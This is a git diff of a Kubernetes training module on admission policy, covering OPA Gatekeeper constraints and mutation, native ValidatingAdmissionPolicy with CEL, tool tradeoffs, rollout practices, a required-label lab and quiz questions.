-name: Test OPA Policies
-on: [push, pull_request]
-jobs:
-  test:
-    runs-on: ubuntu-latest
-    steps:
-    - uses: actions/checkout@v4
-
-    - name: Setup OPA
-      uses: open-policy-agent/setup-opa@v2
-      with:
-        version: latest
-
-    - name: Run Rego tests
-      run: opa test policies/ -v
-
-    - name: Validate ConstraintTemplates
-      run: |
-        for file in policies/*.yaml; do
-          opa fmt --check "$file" || exit 1
-        done
-```
-
----
-
-## Advanced Patterns
-
-### External Data
-
-```yaml
-# Sync data from cluster into OPA
-apiVersion: config.gatekeeper.sh/v1alpha1
-kind: Config
-metadata:
-  name: config
-  namespace: gatekeeper-system
-spec:
-  sync:
-    syncOnly:
-    - group: ""
-      version: "v1"
-      kind: "Namespace"
-    - group: "networking.k8s.io"
-      version: "v1"
-      kind: "Ingress"
-```
-
-```rego
-# Use synced data in policy
-package k8suniqueingress
-
-violation[{"msg": msg}] {
-  input.review.kind.kind == "Ingress"
-  host := input.review.object.spec.rules[_].host
-
-  # Check against all existing ingresses
-  other := data.inventory.namespace[ns][otherapiversion]["Ingress"][name]
-  other.spec.rules[_].host == host
-
-  # Not the same ingress
-  other.metadata.name != input.review.object.metadata.name
-
-  msg := sprintf("Ingress host '%v' already in use by '%v/%v'", [host, ns, name])
-}
-```
-
-### Mutation Policies
-
-```yaml
-# Gatekeeper also supports mutation
 apiVersion: mutations.gatekeeper.sh/v1
 kind: Assign
 metadata:
-  name: add-default-securitycontext
+  name: default-run-as-nonroot
 spec:
   applyTo:
   - groups: [""]
-    kinds: ["Pod"]
     versions: ["v1"]
+    kinds: ["Pod"]
   match:
     scope: Namespaced
     kinds:
@@ -531,215 +219,345 @@ spec:
       value: true
 ```
 
-> 💡 **Did You Know?** Gatekeeper supports mutation alongside validation, so you can enforce settings like `runAsNonRoot` and also assign defaults when matching resources omit them.
+`ModifySet` is the companion pattern for list fields. It can add or remove list entries as though the list were a set, which is useful for arguments, capabilities, or other list-like fields. The risk is that list mutation can become surprising when application authors also manage the same field. If a platform mutates list fields, it should document exactly which fields it owns and how application teams can inspect the final admitted object.
 
+The safest mutation policy is one that is narrow, idempotent, and visible. Narrow means it matches only the resources and namespaces that need it. Idempotent means repeated admission does not keep changing the object. Visible means the team can explain the mutation through docs, audit annotations, events, or reviewable policy code. A mutator that silently edits broad classes of resources is a future debugging problem.
+
+## The Native Shift: ValidatingAdmissionPolicy And CEL
+
+Kubernetes no longer requires every custom validation policy to run through an external webhook. [ValidatingAdmissionPolicy](https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/) is a built-in admission API that uses CEL expressions and `ValidatingAdmissionPolicyBinding` resources. The Kubernetes project announced this feature as generally available in [Kubernetes 1.30](https://kubernetes.io/blog/2024/04/24/validating-admission-policy-ga/), and the current docs list the feature state as stable.
+
+The durable shift is architectural. A webhook policy engine runs outside the API server, so the API server must call a service over the network during admission. A ValidatingAdmissionPolicy evaluates CEL in process as part of the API server's admission path. The [Kubernetes CEL documentation](https://kubernetes.io/docs/reference/using-api/cel/) explains that CEL expressions are evaluated directly in the API server, which makes CEL a useful alternative to out-of-process mechanisms for many extensibility cases.
+
+Here is the same required-label idea in native Kubernetes form. The policy contains the CEL expression, and the binding chooses the enforcement actions and match scope. Starting with `Warn` and `Audit` mirrors the safer rollout pattern you saw with Gatekeeper, while changing the binding to `Deny` makes the policy blocking.
+
+```yaml
+apiVersion: admissionregistration.k8s.io/v1
+kind: ValidatingAdmissionPolicy
+metadata:
+  name: require-team-label.example.com
+spec:
+  failurePolicy: Fail
+  matchConstraints:
+    resourceRules:
+    - apiGroups: [""]
+      apiVersions: ["v1"]
+      operations: ["CREATE", "UPDATE"]
+      resources: ["pods"]
+  validations:
+  - expression: "has(object.metadata.labels) && 'team' in object.metadata.labels"
+    message: "Pod must have a team label."
 ---
-
-## Debugging Policies
-
-```bash
-# Check constraint status
-kubectl describe k8srequiredlabels require-team-label
-
-# View audit results
-kubectl get constraint -o json | jq '.items[].status'
-
-# Check Gatekeeper logs
-kubectl logs -n gatekeeper-system -l control-plane=controller-manager
-
-# Test policy with specific input
-opa eval --data policy.rego --input input.json "data.k8srequiredlabels.violation"
+apiVersion: admissionregistration.k8s.io/v1
+kind: ValidatingAdmissionPolicyBinding
+metadata:
+  name: require-team-label-warning.example.com
+spec:
+  policyName: require-team-label.example.com
+  validationActions: [Warn, Audit]
 ```
 
----
+Native policy changes the build-versus-adopt calculus. If a rule is simple, local to the submitted object, and expressible cleanly in CEL, ValidatingAdmissionPolicy may remove the operational burden of a webhook. If a rule needs rich libraries, external data, reusable templates, broad reporting, or existing Rego investment, Gatekeeper may still be the better fit. If a team wants YAML-native authoring and generation capabilities, Kyverno may be a better peer to evaluate.
+
+MutatingAdmissionPolicy is the matching native direction for mutation. The current upstream [MutatingAdmissionPolicy documentation](https://kubernetes.io/docs/reference/access-authn-authz/mutating-admission-policy/) describes CEL-based mutation policies that can apply server-side apply style mutations or JSON patches. KubeDojo's current Kubernetes standard for content is 1.35, while the public current docs page lists the feature as stable in 1.36. For 1.35-targeted exercises, treat MutatingAdmissionPolicy as a version-dependent native peer and verify the API on the actual cluster before relying on it.
+
+The practical takeaway is not that webhooks are obsolete. The practical takeaway is that admission policy now has a native in-tree option for many validation use cases. Platform teams should choose the smallest mechanism that can express the rule, operate reliably, and give users clear feedback. A simple label rule does not need the same machinery as a registry trust policy with external attestations.
+
+## Landscape Snapshot And Rosetta
+
+> **Landscape snapshot — as of 2026-06. This changes fast; verify against vendor docs before relying on specifics.**
+
+OPA is a CNCF Graduated project; the [CNCF OPA project page](https://www.cncf.io/projects/open-policy-agent-opa/) records graduation on January 29, 2021. Kyverno is also CNCF Graduated; the [CNCF Kyverno project page](https://www.cncf.io/projects/kyverno/) records the move to Graduated on March 16, 2026, and the [CNCF announcement](https://www.cncf.io/announcements/2026/03/24/cloud-native-computing-foundation-announces-kyvernos-graduation/) is dated March 24, 2026. ValidatingAdmissionPolicy is Kubernetes native and GA since 1.30. MutatingAdmissionPolicy is the native mutation peer to track, but verify the feature state against the exact Kubernetes version and provider you run.
+
+| Durable capability | OPA Gatekeeper | Kyverno | Native ValidatingAdmissionPolicy (CEL) | Polaris |
+|--------------------|----------------|---------|----------------------------------------|---------|
+| Policy language | Rego, and newer Gatekeeper paths can use CEL in templates | YAML and CEL in current policy types | CEL only | Built-in checks plus custom JSON Schema |
+| Validating admission | Yes, via validating webhook and constraints | Yes, via admission controller and policy resources | Yes, in process through the API server | Yes, as an admission controller |
+| Mutating admission | Yes, through mutation CRDs such as `Assign` and `ModifySet` | Yes, through mutation policy types | No; validation only | Can remediate some workload configuration issues |
+| Audit and reports | Gatekeeper audit records existing violations on constraints | PolicyReports and background scans are part of the model | Binding actions include `Audit`, with cluster audit integration | Dashboard, CLI, and admission modes report workload checks |
+| Generation | Not the core model | Generation is a core Kyverno capability | No generation | No general resource generation model |
+| In-tree vs webhook | Webhook-based controller | Webhook-based controller, with newer native policy integrations | In-tree API server evaluation | Webhook or CLI/dashboard depending on mode |
+| External data | Gatekeeper external data providers | Kubernetes resources and API calls in current policy model | Parameter resources, not arbitrary webhook calls | Configuration-focused checks, not a general external-data engine |
+
+The Rosetta table is not a ranking. It is a map of tradeoffs. Rego is expressive and portable across OPA use cases, but it asks policy authors to learn a language that feels different from YAML. Kyverno aligns closely with Kubernetes resource authoring and adds generation and reporting features, but the policy model is its own system to operate. Native CEL reduces webhook operations for simple validation, but it is intentionally smaller than a full policy engine. Polaris focuses on workload best-practice checks and is useful when that narrower shape matches the problem.
+
+Use Gatekeeper in this module as the running example because it makes the policy lifecycle visible. You can see the reusable template, the concrete constraint, the Rego rule, the match scope, the audit result, and the enforcement action. When you later study Kyverno, compare it on the same axes rather than asking which tool is "better" in the abstract.
+
+## Operational Concerns That Decide Success
+
+Webhook failure policy is one of the most important production decisions. Kubernetes dynamic admission webhooks can use `failurePolicy: Fail` or `Ignore`; the [dynamic admission control documentation](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/) explains that `Fail` rejects the request when the webhook cannot be called, while `Ignore` proceeds without the webhook. `Fail` preserves policy during outages but can lock out cluster writes if the webhook is down. `Ignore` preserves availability but creates a policy bypass during webhook failure.
+
+There is no universally correct failure policy. For high-risk security policies, failing closed may be appropriate after the webhook is highly available, monitored, and tested. For early rollout or non-critical advisory policies, failing open may be less disruptive. The decision should be written down with the policy's purpose, not copied from a blog post. A policy that exists to prevent privileged production workloads has a different availability tradeoff than a policy that encourages optional metadata hygiene.
+
+Latency is the second concern. Admission happens on the API server write path, so every webhook call adds cost to user requests and controllers. A slow policy engine can slow deploys, operators, and controllers that create many objects. A policy that calls external data during admission adds another dependency to the path. If an external lookup is necessary, cache aggressively, set timeouts deliberately, and test behavior when the provider is unavailable.
+
+Scope is the third concern. Broad matching is easy and dangerous. A constraint with no namespace selector, no excluded namespaces, and no resource-kind discipline can affect system add-ons, operators, and emergency repair workflows. Start with namespace labels, explicit resource kinds, and a documented exclusion model. Exclusions are not policy failure; they are part of safe operations when they are reviewed, temporary where possible, and visible.
+
+Testing is the fourth concern. A good policy repository contains unit tests for policy logic, example manifests for common failures, and an integration path that evaluates real Kubernetes YAML before deployment. `opa test` is useful for Rego logic, Conftest is useful for structured files in CI, and a temporary cluster is useful for checking that the exact Gatekeeper `ConstraintTemplate` and `Constraint` APIs are accepted by the Kubernetes API server. Each layer catches a different class of mistake.
+
+Progressive rollout is the final concern. Good platform teams create a path from observe to warn to enforce. They also publish the message developers will see, the remediation examples, the owner of the policy, and the exception process. A policy with no owner becomes a stale blocker. A policy with no remediation example becomes a support queue. A policy with no audit phase becomes a surprise.
+
+## Worked Example: Required Labels With Gatekeeper
+
+This worked example enforces required labels on Pods in a dedicated lab namespace. It starts in `dryrun` so you can confirm the policy and audit behavior without blocking workloads, then promotes the constraint to `deny`. The same pattern works for image registry restrictions, resource limit requirements, and security context rules. The details differ, but the lifecycle stays the same.
+
+First, create a namespace and mark it as in scope. This label is deliberately policy-specific so a team can opt a namespace into enforcement during rollout without changing every constraint. In production, namespace selection should be managed by your platform ownership model rather than left as an arbitrary developer toggle.
+
+```bash
+kubectl create namespace gatekeeper-lab
+kubectl label namespace gatekeeper-lab policy.kubedojo.io/enforce=true
+```
+
+Install Gatekeeper using a pinned release manifest if your cluster does not already have it. The release version below is a dated example for this module; verify the [Gatekeeper releases](https://github.com/open-policy-agent/gatekeeper/releases) and your cluster compatibility before production use. The command is copy-runnable for a test cluster with cluster-admin permissions and a current `kubectl` context.
+
+```bash
+GATEKEEPER_VERSION=v3.22.2
+kubectl apply -f "https://raw.githubusercontent.com/open-policy-agent/gatekeeper/${GATEKEEPER_VERSION}/deploy/gatekeeper.yaml"
+kubectl wait --for=condition=available deployment/gatekeeper-controller-manager -n gatekeeper-system --timeout=180s
+```
+
+Apply the `ConstraintTemplate` and `Constraint` from the earlier examples. Save them as `required-labels-template.yaml` and `required-labels-constraint.yaml`, then apply them with `kubectl apply -f`. Watch the template status after applying it because Gatekeeper reports ingestion errors there when Rego or schema validation fails.
+
+```bash
+kubectl apply -f required-labels-template.yaml
+kubectl get constrainttemplate k8srequiredlabels -o yaml
+kubectl apply -f required-labels-constraint.yaml
+kubectl get k8srequiredlabels require-team-and-app -o yaml
+```
+
+Create a violating Pod while the constraint is still in `dryrun`. The request should be allowed because the policy is observing rather than enforcing. After the audit cycle runs, the violation should appear on the constraint status. Audit timing is not instantaneous, so give the controller a short window before assuming the policy failed.
+
+```bash
+kubectl run missing-labels \
+  --namespace gatekeeper-lab \
+  --image=registry.k8s.io/pause:3.10 \
+  --restart=Never
+
+kubectl get k8srequiredlabels require-team-and-app -o jsonpath='{.status.totalViolations}{"\n"}'
+```
+
+Promote the policy to denial only after you have confirmed the audit output and message. The patch below changes only the enforcement action. Then create one violating Pod and one compliant Pod so you can see both paths. The violating Pod should be denied with the policy message, and the compliant Pod should be admitted.
+
+```bash
+kubectl patch k8srequiredlabels require-team-and-app \
+  --type=merge \
+  -p '{"spec":{"enforcementAction":"deny"}}'
+
+kubectl run blocked \
+  --namespace gatekeeper-lab \
+  --image=registry.k8s.io/pause:3.10 \
+  --restart=Never
+
+kubectl run allowed \
+  --namespace gatekeeper-lab \
+  --image=registry.k8s.io/pause:3.10 \
+  --restart=Never \
+  --labels=team=platform,app=allowed
+```
+
+Cleanup matters in policy labs because admission rules can outlive the exercise and surprise later work. Delete the constraint before the template, then delete the lab namespace. If you installed Gatekeeper only for this lab, remove it after all constraints and mutation resources are gone. In a shared development cluster, coordinate that removal with other users first.
+
+```bash
+kubectl delete k8srequiredlabels require-team-and-app
+kubectl delete constrainttemplate k8srequiredlabels
+kubectl delete namespace gatekeeper-lab
+```
+
+The required-label example is intentionally simple, but it exercises the core workflow. You deployed Gatekeeper, installed reusable policy logic through a `ConstraintTemplate`, instantiated that logic through a `Constraint`, observed audit behavior, and then promoted enforcement. The same rollout pattern is the habit you want before writing higher-impact policies such as registry restrictions or pod security controls.
+
+## Patterns & Anti-Patterns
+
+### Pattern: Start With Intent, Then Encode
+
+Strong policy work begins with a sentence that a human can evaluate: "Pods in production namespaces must declare team and app labels." Only after that sentence is clear should you choose Rego, CEL, Kyverno YAML, or another encoding. If the intent is vague, the policy code becomes a debate disguised as automation. Clear intent also gives reviewers a way to decide whether the policy is too broad, too narrow, or missing an exception path.
+
+### Pattern: Separate Policy Logic From Rollout Scope
+
+Reusable policy logic should not hard-code every namespace, registry, or team-specific exception. Gatekeeper's template and constraint split gives you this separation naturally: the template holds the logic, and the constraint holds parameters, scope, and enforcement action. This pattern lets the same rule run in `dryrun` for one namespace, `warn` for another, and `deny` for a third while the underlying logic remains reviewable and tested in one place.
+
+### Pattern: Write Messages For The Person Holding The Pager
+
+The user-facing message is part of the product. "Denied by policy" is not enough. A useful message names the failed field, the requirement, and the simplest fix. During an incident, a developer may not know Rego or know who owns the policy. A clear message can turn a blocked deployment into a quick manifest correction instead of a support escalation.
+
+### Anti-Pattern: Enforce Before You Audit
+
+Immediate denial feels decisive, but it often turns unknown drift into blocked work. Existing workloads may lack labels, old charts may use registries you forgot, and operators may create resources that do not follow application-team conventions. Enforcing before audit makes the platform team discover these facts through failures. Audit first so the team learns from data rather than from production pressure.
+
+### Anti-Pattern: Put Slow Business Logic In Admission
+
+Admission is not the place for a multi-step approval workflow or an unreliable external dependency. If a policy needs to ask a slow system for every Pod create request, the platform has placed that system on the cluster write path. Prefer pre-admission workflows for heavyweight business decisions and admission policies for compact invariants that can be evaluated quickly and reliably.
+
+### Anti-Pattern: Treat One Tool As The Policy Strategy
+
+A tool can enforce rules, but it is not the strategy. The strategy is the policy lifecycle, ownership model, test discipline, rollout plan, exception process, and observability path. A team can misuse Gatekeeper, Kyverno, native CEL, or Polaris in the same way by skipping audit, hiding messages, and enforcing broad rules with no owner. Choose tools after the operating model is clear.
+
+### Decision Framework
+
+| Question | Gatekeeper-leaning answer | Native CEL-leaning answer | Kyverno or Polaris-leaning answer |
+|----------|---------------------------|---------------------------|-----------------------------------|
+| Is the rule complex, reusable, or already written in Rego? | Gatekeeper is a natural fit. | Native CEL may be too small. | Kyverno may fit if YAML or CEL authoring is preferred. |
+| Can the rule be expressed as a short object-local CEL expression? | Gatekeeper can do it, but may be more machinery. | ValidatingAdmissionPolicy is a strong candidate. | Kyverno can still be useful if reports or broader workflows matter. |
+| Does the rule need generation or rich YAML-native workflows? | Gatekeeper is not centered on generation. | Native CEL does not generate resources. | Kyverno is the peer to evaluate, and Polaris fits workload checks. |
+| Does the rule need external data at admission time? | Gatekeeper external data may fit with careful latency controls. | Native CEL is intentionally limited here. | Kyverno may fit some Kubernetes resource and API lookup cases. |
+| Is the main need a workload best-practice audit? | Gatekeeper can enforce custom rules. | Native CEL can enforce specific validations. | Polaris may be simpler when its built-in checks match the need. |
+
+The framework should lead to a conversation, not a reflex. A small organization with a handful of label rules may prefer native CEL to avoid operating a webhook. A platform with existing Rego, constraint libraries, and cross-system OPA usage may prefer Gatekeeper. A team that wants Kubernetes-shaped policy resources with generation and policy reports may prefer Kyverno. A team auditing workload hygiene may start with Polaris. The correct answer depends on capability fit and operational maturity.
+
+## Did You Know?
+
+- **Admission does not protect reads**: Kubernetes admission applies to requests that create, update, delete, or otherwise modify resources, while read operations such as get, list, and watch bypass the admission layer.
+- **Gatekeeper audit is separate from admission denial**: audit evaluates existing resources and records violations, while admission enforcement decides what happens to new or updated requests.
+- **ValidatingAdmissionPolicy has multiple actions**: a binding can use `Deny`, `Warn`, and `Audit`, which lets native CEL policies follow the same progressive rollout idea.
+- **Constraint parameters are schema-checked**: a Gatekeeper `ConstraintTemplate` defines the parameter schema, so the API server can reject constraints with the wrong parameter shape.
 
 ## Common Mistakes
 
 | Mistake | Problem | Solution |
 |---------|---------|----------|
-| Policy blocks kube-system | Core components can't deploy | Exclude `kube-system` in constraints |
-| No dry-run testing | Breaking changes hit production | Use `enforcementAction: dryrun` first |
-| Overly strict policies | Developers can't work | Start permissive, tighten gradually |
-| Complex Rego with no tests | Policy bugs in production | Write unit tests for every policy |
-| Forgetting init containers | Security holes in init phase | Always check both containers and initContainers |
-| Blocking all during rollout | Existing pods fail validation | Gatekeeper only checks new/updated resources |
-
----
-
-## War Story: The Policy That Cried Wolf
-
-*A platform team that deploys strict container registry policies without auditing current image usage can quickly trigger a large wave of exception requests.*
-
-**What went wrong**: They blocked everything except `gcr.io/company-project/`, but:
-- Some Helm charts may pull images from registries outside your initial allowlist.
-- Operational add-ons may depend on images from registries outside your initial allowlist.
-- Monitoring components may also depend on registries you did not initially account for.
-
-**The fix**:
-1. Audit existing images BEFORE deploying policies
-2. Start with `dryrun` to identify violations
-3. Build allowlist from actual usage, not assumptions
-4. Communicate changes with 2-week notice
-
-```bash
-# Audit existing images
-kubectl get pods -A -o jsonpath='{.items[*].spec.containers[*].image}' | tr ' ' '\n' | sort -u
-```
-
----
+| Matching only Pods when teams deploy Deployments | The policy may miss controller templates or produce confusing coverage gaps | Decide whether to validate Pods at creation, controller templates at submission, or both, then test each resource kind |
+| Enforcing without an audit phase | Existing drift becomes blocked work when teams touch old resources | Start with `dryrun` or `warn`, review violations, and publish remediation steps before denial |
+| Forgetting init or ephemeral containers | A security rule may miss containers that run outside the main `containers` list | Normalize all relevant container lists in helper rules and test each list explicitly |
+| Using `failurePolicy: Fail` without recovery planning | A webhook outage can block cluster writes and slow incident response | Pair fail-closed policies with high availability, monitoring, runbooks, and scoped break-glass procedures |
+| Calling slow external services during admission | API writes inherit the latency and availability of that dependency | Prefer cached data, short timeouts, or pre-admission checks for heavy lookups |
+| Writing vague denial messages | Developers cannot tell which field to change or who owns the rule | Include the field, requirement, and remediation hint in the policy message |
+| Hard-coding every exception into Rego | Policy code becomes brittle and politically hard to review | Put environment-specific choices into parameters, selectors, and documented exception resources |
+| Treating audit reports as historical evidence | Current-state reports may not preserve the full history of denied or fixed requests | Send admission events, metrics, and audit logs to observability systems when history matters |
 
 ## Quiz
 
 ### Question 1
-What's the difference between a ConstraintTemplate and a Constraint?
 
-<details>
-<summary>Show Answer</summary>
+A team has CI checks that reject privileged containers, but a cluster administrator can still create a privileged Pod with `kubectl apply`. Where should the durable enforcement point be, and why?
 
-**ConstraintTemplate**: Defines the policy LOGIC in Rego. It's like a class definition or function.
+<details><summary>Answer</summary>
 
-**Constraint**: Instance of a template with specific PARAMETERS. It's like calling a function with arguments.
-
-Example:
-- ConstraintTemplate: "Check if labels exist"
-- Constraint: "Require labels `team` and `env` on Pods in namespace `production`"
-
-One ConstraintTemplate can have many Constraints with different parameters.
+The durable enforcement point should be Kubernetes admission because it runs after authentication and authorization but before the object is persisted. CI is useful because it gives early feedback, but it can be bypassed by direct cluster access, old automation, or controllers that create resources. Admission gives the cluster a final gate for object-level rules such as no privileged pods. A good design still keeps CI checks for speed and admission checks for last-mile enforcement.
 
 </details>
 
 ### Question 2
-How do you test a policy without blocking deployments?
 
-<details>
-<summary>Show Answer</summary>
+You need to **Deploy OPA Gatekeeper and configure ConstraintTemplates for Kubernetes admission policy enforcement**. What is the difference between the `ConstraintTemplate` and the `Constraint` you apply afterward?
 
-Use `enforcementAction: dryrun` in the Constraint:
+<details><summary>Answer</summary>
 
-```yaml
-spec:
-  enforcementAction: dryrun  # Options: deny, dryrun, warn
-```
-
-- `deny`: Block violations (default)
-- `dryrun`: Record violations but don't block
-- `warn`: Show warning but allow
-
-Check violations via: `kubectl get constraint <name> -o yaml`
+The `ConstraintTemplate` defines the reusable policy type: the parameter schema, the policy code, and the Kubernetes kind that will represent concrete constraints. The `Constraint` is the configured instance of that template, with match scope, parameters, and enforcement action. In the required-label example, the template defines how to find missing labels, while the constraint says which labels are required and where the rule applies. This split lets one policy implementation support different namespaces, parameters, and rollout modes.
 
 </details>
 
 ### Question 3
-Why might a policy work for Pods but miss deployments?
 
-<details>
-<summary>Show Answer</summary>
+You want to **Implement Rego policies for pod security, resource limits, label requirements, and image restrictions**. A Rego policy works for direct Pod creation but does not catch a Deployment that later creates Pods. What is the likely design bug?
 
-Gatekeeper evaluates the exact resource submitted. When you `kubectl apply` a Deployment, Gatekeeper sees the Deployment—not the Pods it will create.
+<details><summary>Answer</summary>
 
-Solutions:
-1. Match on `Pod` - catches pods when created by controllers
-2. Match on `Deployment` AND check `.spec.template.spec.containers`
-3. Use the pod-specific path in Rego:
-   ```rego
-   # For Deployments
-   containers := input.review.object.spec.template.spec.containers
-
-   # For Pods
-   containers := input.review.object.spec.containers
-   ```
+The likely bug is that the policy only reads the Pod shape at `spec.containers` while the Deployment stores its pod template at `spec.template.spec.containers`. Gatekeeper evaluates the object submitted to admission, so a Deployment request is not the same object shape as a Pod request. The policy should either match Pods when they are created by controllers, validate controller templates directly, or normalize both shapes through helper rules. Tests should include each resource kind the policy claims to cover.
 
 </details>
 
----
+### Question 4
 
-## Hands-On Exercise
+A security team wants to block images from registries outside an allowlist, but audit shows many existing add-ons use registries that were not considered. What rollout mode should you use first?
 
-### Objective
-Create and deploy policies to enforce container security standards.
+<details><summary>Answer</summary>
 
-### Environment Setup
+Start with audit-oriented rollout, such as Gatekeeper `dryrun` or possibly `warn`, instead of immediate denial. That lets you see existing violations and refine the allowlist without breaking workloads or blocking unrelated updates. After the team understands the violations, it can communicate remediation, add legitimate exceptions, and enforce in a smaller scope first. This is how you **Configure Gatekeeper audit mode for policy violation reporting without blocking existing workloads** while still moving toward enforcement.
+
+</details>
+
+### Question 5
+
+Your platform team is choosing between Gatekeeper and native ValidatingAdmissionPolicy for a rule that requires a `team` label on Pods. How should you evaluate the tradeoff?
+
+<details><summary>Answer</summary>
+
+If the rule is a simple object-local validation that fits cleanly in CEL, native ValidatingAdmissionPolicy is attractive because it avoids operating an external webhook. Gatekeeper is still reasonable if the organization already uses Rego, wants reusable constraint templates, or needs Gatekeeper audit and external-data patterns. The decision should compare capability and operations rather than tool identity. This is part of how you **Evaluate OPA Gatekeeper against Kyverno for policy-as-code enforcement complexity and flexibility trade-offs**, with native CEL included as another peer.
+
+</details>
+
+### Question 6
+
+A team proposes a Gatekeeper policy that calls an external vulnerability service during every Pod admission request. What operational risks should you review before approving it?
+
+<details><summary>Answer</summary>
+
+You should review admission latency, provider availability, timeout behavior, caching, and webhook failure policy. If the external service is slow or unavailable, the API server write path may slow down or fail depending on `failurePolicy`. You should also ask whether the heavy check can run before admission and be reduced to a simpler admission invariant. Admission policies should be reliable enough to sit on a hot path.
+
+</details>
+
+### Question 7
+
+A policy author says mutation is safer than denial because it fixes manifests automatically. What is the missing concern?
+
+<details><summary>Answer</summary>
+
+Mutation can be useful, but it can also hide platform behavior and create drift between Git and the object stored in the cluster. A mutator should be narrow, idempotent, documented, and tested against the workloads it affects. If a default changes application behavior, validation with a clear message may be safer than silently editing the object. Mutation is not safer by default; it is safer only when the platform owns the field and users can see what happened.
+
+</details>
+
+## Hands-On
+
+In this exercise, you will install Gatekeeper in a test cluster, create a required-label policy, observe it in `dryrun`, and then promote it to `deny`. Use a disposable cluster or a namespace you are allowed to control because admission policies affect real API writes. If Gatekeeper is already installed, skip the install step and verify the existing version and ownership before applying test policies.
+
+1. Create a namespace named `gatekeeper-lab` and label it with `policy.kubedojo.io/enforce=true`.
+2. Install Gatekeeper or verify that an existing Gatekeeper installation is healthy in `gatekeeper-system`.
+3. Apply the `K8sRequiredLabels` `ConstraintTemplate` from this module and confirm that the template status has no ingestion errors.
+4. Apply the `require-team-and-app` constraint in `dryrun` mode and create one Pod without labels in the lab namespace.
+5. Inspect the constraint status for audit violations, then patch the constraint to `deny` and confirm that an unlabeled Pod is blocked while a labeled Pod is admitted.
+
+Success criteria:
+
+- [ ] `kubectl get deployment -n gatekeeper-system gatekeeper-controller-manager` reports an available Gatekeeper controller, or your existing managed policy controller is documented for the lab.
+- [ ] `kubectl get constrainttemplate k8srequiredlabels -o yaml` shows the template was accepted without Rego ingestion errors.
+- [ ] `kubectl get k8srequiredlabels require-team-and-app -o yaml` shows `enforcementAction: dryrun` before enforcement promotion.
+- [ ] An unlabeled Pod in `gatekeeper-lab` is admitted during `dryrun` and appears as an audit violation after the audit cycle.
+- [ ] After patching to `deny`, an unlabeled Pod is rejected and a Pod with `team` and `app` labels is admitted.
+
+Verification commands:
 
 ```bash
-# Install Gatekeeper
-kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/v3.14.0/deploy/gatekeeper.yaml
-
-# Wait for it
-kubectl wait --for=condition=ready pod -l control-plane=controller-manager -n gatekeeper-system --timeout=90s
+kubectl get namespace gatekeeper-lab --show-labels
+kubectl get constrainttemplate k8srequiredlabels -o yaml
+kubectl get k8srequiredlabels require-team-and-app -o yaml
+kubectl get pods -n gatekeeper-lab --show-labels
+kubectl logs -n gatekeeper-system -l control-plane=controller-manager --tail=100
 ```
 
-### Tasks
+Clean up after the exercise so that the lab policy does not affect later work. Delete the concrete constraint before deleting the template because constraints depend on the generated kind. If you installed Gatekeeper only for this exercise, remove it after the constraints and templates are gone.
 
-1. **Create ConstraintTemplate** for allowed registries (provided above)
+```bash
+kubectl delete k8srequiredlabels require-team-and-app --ignore-not-found
+kubectl delete constrainttemplate k8srequiredlabels --ignore-not-found
+kubectl delete namespace gatekeeper-lab --ignore-not-found
+```
 
-2. **Deploy Constraint** allowing only `gcr.io/` and `ghcr.io/`:
-   ```yaml
-   apiVersion: constraints.gatekeeper.sh/v1beta1
-   kind: K8sAllowedRepos
-   metadata:
-     name: allowed-repos
-   spec:
-     match:
-       kinds:
-       - apiGroups: [""]
-         kinds: ["Pod"]
-     parameters:
-       repos:
-       - "gcr.io/"
-       - "ghcr.io/"
-   ```
+## Sources
 
-3. **Test policy** by deploying a violating pod:
-   ```bash
-   kubectl run nginx --image=nginx:latest
-   # Should be denied
-   ```
-
-4. **Test compliance** with allowed registry:
-   ```bash
-   kubectl run allowed --image=gcr.io/google-containers/pause:3.2
-   # Should succeed
-   ```
-
-5. **Check audit results**:
-   ```bash
-   kubectl get k8sallowedrepos allowed-repos -o yaml
-   ```
-
-### Success Criteria
-- [ ] Gatekeeper controller running
-- [ ] ConstraintTemplate created successfully
-- [ ] Constraint shows `0` totalViolations initially
-- [ ] `nginx:latest` deployment blocked with clear error message
-- [ ] `gcr.io/` image allowed
-- [ ] Audit shows violation details for blocked attempt
-
-### Bonus Challenge
-Add a second constraint that requires all pods to have a `team` label.
-
----
-
-## Further Reading
-
-- [OPA Documentation](https://www.openpolicyagent.org/docs/)
-- [Gatekeeper Documentation](https://open-policy-agent.github.io/gatekeeper/)
-- [Gatekeeper Policy Library](https://open-policy-agent.github.io/gatekeeper-library/)
-- [Rego Playground](https://play.openpolicyagent.org/) - Test policies online
-
----
+- [Kubernetes Admission Control](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/) - Primary documentation for the admission phase, mutating versus validating admission, and where admission sits in the API write path.
+- [Kubernetes Dynamic Admission Control](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/) - Primary documentation for webhook behavior, `failurePolicy`, and dynamic admission operations.
+- [Kubernetes Validating Admission Policy](https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/) - Primary documentation for native CEL validation policy resources and binding actions.
+- [Kubernetes Validating Admission Policy GA Announcement](https://kubernetes.io/blog/2024/04/24/validating-admission-policy-ga/) - Kubernetes project announcement that ValidatingAdmissionPolicy reached GA in Kubernetes 1.30.
+- [Kubernetes Mutating Admission Policy](https://kubernetes.io/docs/reference/access-authn-authz/mutating-admission-policy/) - Primary documentation for native CEL mutation policy concepts and feature state.
+- [Common Expression Language in Kubernetes](https://kubernetes.io/docs/reference/using-api/cel/) - Primary documentation for CEL usage, API server evaluation, and expression constraints in Kubernetes.
+- [OPA Policy Language](https://www.openpolicyagent.org/docs/policy-language) - Primary documentation for Rego, declarative policy evaluation, and structured-data policy authoring.
+- [OPA Kubernetes Admission Control](https://openpolicyagent.org/docs/kubernetes) - Primary OPA documentation for Kubernetes admission-control integration patterns.
+- [OPA Policy Testing](https://www.openpolicyagent.org/docs/policy-testing) - Primary documentation for writing tests for Rego policies.
+- [Gatekeeper How To](https://open-policy-agent.github.io/gatekeeper/website/docs/howto/) - Primary Gatekeeper documentation for constraints, templates, matching, parameters, and enforcement actions.
+- [Gatekeeper Releases](https://github.com/open-policy-agent/gatekeeper/releases) - Primary release page used to verify the dated install example before pinning a lab manifest.
+- [Gatekeeper Constraint Templates](https://open-policy-agent.github.io/gatekeeper/website/docs/constrainttemplates/) - Primary documentation for `ConstraintTemplate` structure and policy code fields.
+- [Gatekeeper Handling Constraint Violations](https://open-policy-agent.github.io/gatekeeper/website/docs/violations/) - Primary documentation for `deny`, `dryrun`, and `warn` enforcement actions.
